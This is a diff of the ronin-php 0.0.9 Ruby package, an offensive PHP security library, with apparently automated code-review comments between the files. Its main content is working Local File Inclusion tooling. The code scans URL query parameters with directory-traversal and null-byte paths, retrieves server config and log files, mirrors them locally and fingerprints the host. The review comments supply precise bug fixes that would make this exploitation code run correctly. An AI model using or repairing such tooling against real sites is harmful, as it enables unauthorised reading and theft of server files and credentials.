ronin-php 0.0.9
- data/COPYING.txt +339 -0
- data/History.txt +10 -0
- data/Manifest.txt +36 -0
- data/README.txt +70 -0
- data/Rakefile +19 -0
- data/lib/ronin/php.rb +27 -0
- data/lib/ronin/php/extensions.rb +24 -0
- data/lib/ronin/php/extensions/string.rb +42 -0
- data/lib/ronin/php/lfi.rb +28 -0
- data/lib/ronin/php/lfi/exceptions.rb +24 -0
- data/lib/ronin/php/lfi/exceptions/unknown_target.rb +31 -0
- data/lib/ronin/php/lfi/extensions.rb +24 -0
- data/lib/ronin/php/lfi/extensions/uri.rb +24 -0
- data/lib/ronin/php/lfi/extensions/uri/http.rb +58 -0
- data/lib/ronin/php/lfi/file.rb +86 -0
- data/lib/ronin/php/lfi/lfi.rb +245 -0
- data/lib/ronin/php/lfi/target.rb +344 -0
- data/lib/ronin/php/rfi.rb +25 -0
- data/lib/ronin/php/rfi/extensions.rb +24 -0
- data/lib/ronin/php/rfi/extensions/uri.rb +24 -0
- data/lib/ronin/php/rfi/extensions/uri/http.rb +54 -0
- data/lib/ronin/php/rfi/rfi.rb +127 -0
- data/lib/ronin/rpc/php.rb +28 -0
- data/lib/ronin/rpc/php/call.rb +45 -0
- data/lib/ronin/rpc/php/client.rb +152 -0
- data/lib/ronin/rpc/php/console.rb +42 -0
- data/lib/ronin/rpc/php/response.rb +63 -0
- data/lib/ronin/rpc/php/rfi.rb +46 -0
- data/lib/ronin/rpc/php/shell.rb +70 -0
- data/spec/spec_helper.rb +5 -0
- data/static/rfi/test.php +27 -0
- data/static/rpc/server.php +482 -0
- data/tasks/helpers.rb +1 -0
- data/tasks/helpers/minify.rb +54 -0
- data/tasks/spec.rb +7 -0
- data/tasks/static.rb +34 -0
- metadata +132 -0
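--- /dev/null
+++ b/data/Rakefile
@@ -0,0 +1,19 @@
+# -*- ruby -*-
+
+require 'rubygems'
+require 'hoe'
+require './tasks/spec.rb'
+require './tasks/static.rb'
+require './lib/ronin/php/version.rb'
+
+Hoe.new('ronin-php', Ronin::PHP::VERSION) do |p|
+p.rubyforge_name = 'ronin'
+p.developer('Postmodern Modulus III','postmodern.mod3@gmail.com')
+p.extra_deps = [
+['ronin', '>=0.0.9'],
+'cssmin',
+'jsmin'
+]
+end
+
+# vim: syntax=Ruby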
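Review bot: Line 7 requires `./lib/ronin/php/version.rb` and line 9 reads `Ronin::PHP::VERSION` from it, but the package file list at the top of this page contains no `data/lib/ronin/php/version.rb`; if the file really is missing from the gem rather than elided from the listing, every `rake` invocation fails at load time with a LoadError before any task runs. Either add the file to the manifest or guard the constant, e.g. `require './lib/ronin/php/version.rb' if File.exist?('lib/ronin/php/version.rb')` with a fallback version string. A short comment on line 7 such as `# VERSION is defined in lib/ronin/php/version.rb, which must ship with the gem` would also make the dependency visible.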
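--- /dev/null
+++ b/data/lib/ronin/php.rb
@@ -0,0 +1,27 @@
+#
+#--
+# Ronin PHP - A Ruby library for Ronin that provides support for PHP
+# related security tasks.
+#
+# Copyright (c) 2007 Hal Brodigan (postmodern.mod3 at gmail.com)
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation; either version 2 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
+#++
+#
+
+require 'ronin/php/extensions'
+require 'ronin/php/lfi'
+require 'ronin/php/rfi'
+require 'ronin/rpc/php'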
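--- /dev/null
+++ b/data/lib/ronin/php/extensions.rb
@@ -0,0 +1,24 @@
+#
+#--
+# Ronin PHP - A Ruby library for Ronin that provides support for PHP
+# related security tasks.
+#
+# Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation; either version 2 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
+#++
+#
+
+require 'ronin/php/extensions/string'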
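--- /dev/null
+++ b/data/lib/ronin/php/extensions/string.rb
@@ -0,0 +1,42 @@
+#
+#--
+# Ronin PHP - A Ruby library for Ronin that provides support for PHP
+# related security tasks.
+#
+# Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation; either version 2 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
+#++
+#
+
+class String
+
+#
+# Returns +true+ if the String contains a PHP Warning message, returns
+# +false+ otherwise.
+#
+def php_warning?
+!((self =~ /<b>Warning<\/b>:\s+/).nil?)
+end
+
+#
+# Returns +true+ if the String contains a PHP Error message, returns
+# +false+ otherwise.
+#
+def php_error?
+!((self =~ /<b>Fatal error<\/b>:\s+/).nil?)
+end
+
+end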
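Review bot: Both predicates (lines 31 and 39) only recognise the `<b>Warning</b>:` / `<b>Fatal error</b>:` form, which PHP emits when its `html_errors` setting is on; plain-text responses such as `Warning: include(...)` or `Fatal error: ...` go undetected, and `php_error?` also ignores `Parse error` and `Notice` messages, so a false negative here silently hides a server that is disclosing paths. The doc comments should say so, e.g. `# Only matches the HTML (html_errors=On) form of the message.`, or the patterns could be widened to `/(<b>)?Warning(<\/b>)?:\s+/`. On style, `!((self =~ re).nil?)` is a double negation; `!!(self =~ re)` reads more directly (`match?` would be the modern form, but this file appears to target a pre-2.4 Ruby given `require 'rubygems'` in the Rakefile).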
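--- /dev/null
+++ b/data/lib/ronin/php/lfi.rb
@@ -0,0 +1,28 @@
+#
+#--
+# Ronin PHP - A Ruby library for Ronin that provides support for PHP
+# related security tasks.
+#
+# Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation; either version 2 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
+#++
+#
+
+require 'ronin/php/lfi/exceptions'
+require 'ronin/php/lfi/extensions'
+require 'ronin/php/lfi/target'
+require 'ronin/php/lfi/file'
+require 'ronin/php/lfi/lfi'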
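--- /dev/null
+++ b/data/lib/ronin/php/lfi/exceptions.rb
@@ -0,0 +1,24 @@
+#
+#--
+# Ronin PHP - A Ruby library for Ronin that provides support for PHP
+# related security tasks.
+#
+# Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation; either version 2 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
+#++
+#
+
+require 'ronin/php/lfi/exceptions/unknown_target'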
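--- /dev/null
+++ b/data/lib/ronin/php/lfi/exceptions/unknown_target.rb
@@ -0,0 +1,31 @@
+#
+#--
+# Ronin PHP - A Ruby library for Ronin that provides support for PHP
+# related security tasks.
+#
+# Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation; either version 2 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
+#++
+#
+
+module Ronin
+module PHP
+class LFI
+class UnknownTarget < RuntimeError
+end
+end
+end
+end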
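--- /dev/null
+++ b/data/lib/ronin/php/lfi/extensions.rb
@@ -0,0 +1,24 @@
+#
+#--
+# Ronin PHP - A Ruby library for Ronin that provides support for PHP
+# related security tasks.
+#
+# Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation; either version 2 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
+#++
+#
+
+require 'ronin/php/lfi/extensions/uri'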
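--- /dev/null
+++ b/data/lib/ronin/php/lfi/extensions/uri.rb
@@ -0,0 +1,24 @@
+#
+#--
+# Ronin PHP - A Ruby library for Ronin that provides support for PHP
+# related security tasks.
+#
+# Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation; either version 2 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
+#++
+#
+
+require 'ronin/php/lfi/extensions/uri/http'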
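--- /dev/null
+++ b/data/lib/ronin/php/lfi/extensions/uri/http.rb
@@ -0,0 +1,58 @@
+#
+#--
+# Ronin PHP - A Ruby library for Ronin that provides support for PHP
+# related security tasks.
+#
+# Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation; either version 2 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
+#++
+#
+
+require 'ronin/php/lfi/lfi'
+
+module URI
+class HTTP < Generic
+
+def test_lfi(options={})
+up = ((options[:up]) || 0..Ronin::PHP::LFI::MAX_UP)
+vulns = []
+
+query_params.each_key do |param|
+lfi = Ronin::PHP::LFI.new(self,param)
+
+up.each do |n|
+lfi.up = n
+
+if lfi.vulnerable?(options)
+vulns << lfi
+break
+end
+end
+end
+
+return vulns
+end
+
+def lfi(options={})
+test_lfi(options).first
+end
+
+def has_lfi?(options={})
+!(test_lfi(options).empty?)
+end
+
+end
+end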
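Review bot: Line 30 does not do what its parentheses suggest: `||` binds tighter than `..`, so `(options[:up]) || 0..MAX_UP` parses as `(options[:up] || 0)..Ronin::PHP::LFI::MAX_UP`; passing `:up => 3` therefore still scans depths 3 through 15, and passing a Range raises `ArgumentError` (bad value for range) when it is used as the lower bound. If the intent is "scan the full range unless the caller fixes the depth(s)", make that explicit and accept either an Integer or a Range: `up = options[:up] ? Array(options[:up]) : (0..Ronin::PHP::LFI::MAX_UP)`. The `test_lfi` doc comment should also state that one `LFI` object is created per query parameter and that the first depth found vulnerable stops the scan for that parameter (the `break` on line 41), since `lfi`/`has_lfi?` both rely on that.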
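--- /dev/null
+++ b/data/lib/ronin/php/lfi/file.rb
@@ -0,0 +1,86 @@
+#
+#--
+# Ronin PHP - A Ruby library for Ronin that provides support for PHP
+# related security tasks.
+#
+# Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation; either version 2 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
+#++
+#
+
+module Ronin
+module PHP
+class LFI
+class File < StringIO
+
+# Path to the file
+attr_reader :path
+
+#
+# Creates a new Inclusion with the specified _path_ and response
+# _body_.
+#
+def initialize(path,body)
+super(body)
+
+@path = path
+end
+
+#
+# Returns the contents of the File in String form.
+#
+def contents
+string
+end
+
+#
+# See contents.
+#
+def to_s
+contents
+end
+
+def inspect
+"#<#{self.class}:#{@path}>"
+end
+
+#
+# Saves the body to specified _destination_, returns the
+# _destination_.
+#
+def save(destination)
+File.open(destination,'w') do |dest|
+dest.write(string)
+end
+
+return destination
+end
+
+def mirror(base)
+dest = File.join(base,@path)
+dest_dir = File.dirname(dest)
+
+unless File.directory?(dest_dir)
+FileUtils.mkdir_p(dest_dir)
+end
+
+return save(dest)
+end
+
+end
+end
+end
+end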
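Review bot: Inside `class File < StringIO` (line 27) the bare constant `File` resolves to `Ronin::PHP::LFI::File` itself, not to core `::File`, so line 65 `File.open(destination,'w')` calls `StringIO.open` on the destination String (truncating and overwriting that string in memory, writing no file, then returning it as if saved), and lines 73, 74 and 76 raise `NoMethodError` because `StringIO` has no `join`, `dirname` or `directory?`. Qualify every core reference: `::File.open(destination,'w')`, `::File.join(base,@path)`, `::File.dirname(dest)`, `::File.directory?(dest_dir)`. `FileUtils` on line 77 is not required anywhere in this file; presumably a caller loads it, but `require 'fileutils'` at the top would remove that dependency. `mirror` (line 72) also lacks a doc comment; `# Writes the body under _base_ at the file's own _path_, creating parent directories, and returns the written path.` describes what the code does.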
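--- /dev/null
+++ b/data/lib/ronin/php/lfi/lfi.rb
@@ -0,0 +1,245 @@
+#
+#--
+# Ronin PHP - A Ruby library for Ronin that provides support for PHP
+# related security tasks.
+#
+# Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation; either version 2 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
+#++
+#
+
+require 'ronin/php/lfi/exceptions/unknown_target'
+require 'ronin/php/lfi/target'
+require 'ronin/php/lfi/file'
+require 'ronin/extensions/uri'
+require 'ronin/network/http'
+require 'ronin/path'
+
+module Ronin
+module PHP
+class LFI
+
+# Maximum number of directories to escape
+MAX_UP = 15
+
+# The URL which is vulnerable
+attr_reader :url
+
+# The vulnerable query param
+attr_accessor :param
+
+# The path prefix
+attr_accessor :prefix
+
+# Number of directories to traverse up
+attr_accessor :up
+
+# Whether to terminate the LFI path with a null byte
+attr_accessor :terminate
+
+# Targeted Operating System (OS)
+attr_accessor :os
+
+#
+# Creates a new LFI object with the specified _url_, _param_ and the
+# given _options_. The specified _param_ indicates which query param
+# in the _url_ is vulnerable to Local File Inclusion.
+#
+# _options_ may contain the following keys:
+# <tt>:prefix</tt>:: The path prefix.
+# <tt>:up</tt>:: The number of directories to transverse up. Defaults
+# to 0.
+# <tt>:terminate</tt>:: Whether or not to terminate the LFI path with
+# a null byte. Defaults to +true+.
+# <tt>:os</tt>:: The Operating System to target.
+#
+def initialize(url,param,options={})
+@url = url
+@param = param
+
+@prefix = options[:prefix]
+@up = (options[:up] || 0)
+
+if options.has_key?(:terminate)
+@terminate = options[:terminate]
+else
+@terminate = true
+end
+
+@os = options[:os]
+end
+
+#
+# Returns +true+ if the LFI path will be terminated with a null byte,
+# returns +false+ otherwise.
+#
+def terminate?
+@terminate == true
+end
+
+#
+# Builds a LFI url to include the specified _path_.
+#
+def url_for(path)
+escape = (@prefix || Path.up(@up))
+full_path = escape.join(path.to_s)
+full_path = "#{full_path}\0" if terminate?
+
+new_url = URI(@url.to_s)
+new_url.query_params[@param.to_s] = full_path
+
+return new_url
+end
+
+#
+# Get the specified _path_ with the given _options_.
+#
+def get(path,options={})
+options = options.merge(:url => url_for(path))
+
+if options[:method] == :post
+return Net.http_post_body(options)
+else
+return Net.http_get_body(options)
+end
+end
+
+#
+# Include the specified _path_ with the given _options_. Returns a
+# new File object for the included _path_.
+#
+def include(path,options={})
+File.new(path,get(path,options))
+end
+
+#
+# Include a targeted file specified by _name_ using the given
+# _options_. Returns a new File object for the included file.
+# If a _block_ is given, it will be passed the newly created File
+# object.
+#
+def include_target(name,options={},&block)
+name = name.to_s
+target = Target.with_file(name)
+
+unless target
+raise(UnknownTarget,"unknown target file #{name.dump}",caller)
+end
+
+return inclusion_of(target,options,&block)
+end
+
+def save_target(name,dest,options={})
+include_target(name,options) do |file|
+file.save(dest)
+end
+end
+
+#
+# Includes all targeted config and log files with the given _options_.
+#
+def include_targets(options={},&block)
+(Target.configs + Target.logs).map { |target|
+include_of(target,options,&block)
+}.compact
+end
+
+#
+# Mirrors all targeted config and log files to the specifed
+# _directory_ using the given _options_.
+#
+def mirror_targets(directory,options={})
+include_targets(options).map do |file|
+file.mirror(directory)
+end
+end
+
+#
+# Returns +true+ if the url is vulnerable to LFI, returns +false+
+# otherwise.
+#
+def vulnerable?(options={})
+Target.tests.each do |target|
+inclusion_of(target) do |file|
+return true
+end
+end
+
+return false
+end
+
+#
+# Extracts information from all targeted files using the given
+# _options_.
+#
+# _options_ may include the following options:
+# <tt>:oses</tt>:: The Array of OSes to test for.
+#
+def fingerprint(options={})
+data = {}
+
+Target.with_extractors.each do |target|
+inclusion_of(target,options) do |file|
+data.merge!(target.extract_from(file.contents))
+end
+end
+
+return data
+end
+
+#
+# Returns the String form of the url.
+#
+def to_s
+@url.to_s
+end
+
+protected
+
+#
+# Returns the available paths of the specified _target_.
+#
+def paths_of(target)
+if @os
+return target.paths_for(@os)
+else
+return target.all_paths
+end
+end
+
+#
+# Returns the File object obtained via the specified _target_
+# and the given _options_. If a _block_ is given, it will be passed
+# the new File object.
+#
+def inclusion_of(target,options={},&block)
+paths_of(target).each do |path|
+body = get(path,options)
+
+if target.included_in?(body)
+file = File.new(path,body)
+
+block.call(file) if block
+return file
+end
+end
+
+return nil
+end
+
+end
+end
+end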
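Review bot: `include_targets` (line 156) calls `include_of(target,options,&block)`, but the only helper defined is `inclusion_of` (line 228), so `include_targets` and everything built on it (`mirror_targets`, line 165) raise `NoMethodError` on first use; the line should read `inclusion_of(target,options,&block)`. `vulnerable?` (line 174) accepts `options` but calls `inclusion_of(target)` on line 176 without forwarding them, so a caller's `:method => :post` or other request settings are silently ignored during the check that `URI::HTTP#test_lfi` relies on; use `inclusion_of(target,options) do |file|`. `fingerprint`'s doc (line 189) advertises an `:oses` option that no code in this file reads — either drop the line or note `# :oses is currently unused; the OS is taken from #os`. Line 98 assumes `@prefix` responds to `join`, which holds for a `Path` but not for a plain String; the `:prefix` doc on line 62 should state the expected type, presumably `Ronin::Path`.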